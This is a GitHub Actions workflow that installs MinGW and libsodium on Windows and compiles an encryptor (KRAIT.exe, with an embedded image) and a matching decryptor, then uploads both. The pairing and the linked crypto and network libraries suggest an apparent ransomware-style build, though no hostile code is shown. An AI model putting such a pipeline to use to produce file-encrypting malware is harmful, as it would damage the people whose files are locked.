name: Build Krait

on: [push, workflow_dispatch]

jobs:
  build:
    runs-on: windows-latest
    
    steps:
    - uses: actions/checkout@v4
    
    - name: Install mingw and libsodium
      run: |
        choco install mingw -y
        choco install libsodium -y
        echo "C:\mingw64\bin" >> $GITHUB_PATH
        echo "C:\ProgramData\chocolatey\lib\libsodium\build\x64\vc16\Release" >> $GITHUB_PATH
    
    - name: Build decryptor
      run: |
        g++ -O2 -s -static -std=c++17 decryptor.cpp -o KRAIT_DECRYPTOR.exe -ladvapi32 -luser32 -lgdi32 -lshell32 -lcrypt32 -lws2_32 -lsodium
    
    - name: Build encryptor
      run: |
        windres -i krait.webp -o krait.res -O coff
        g++ -O2 -s -static -std=c++17 encryptor.cpp krait.res -o KRAIT.exe -ladvapi32 -luser32 -lgdi32 -lshell32 -lcrypt32 -lws2_32 -lsodium
    
    - name: Upload
      uses: actions/upload-artifact@v4
      with:
        name: Krait
        path: |
          KRAIT.exe
          KRAIT_DECRYPTOR.exe
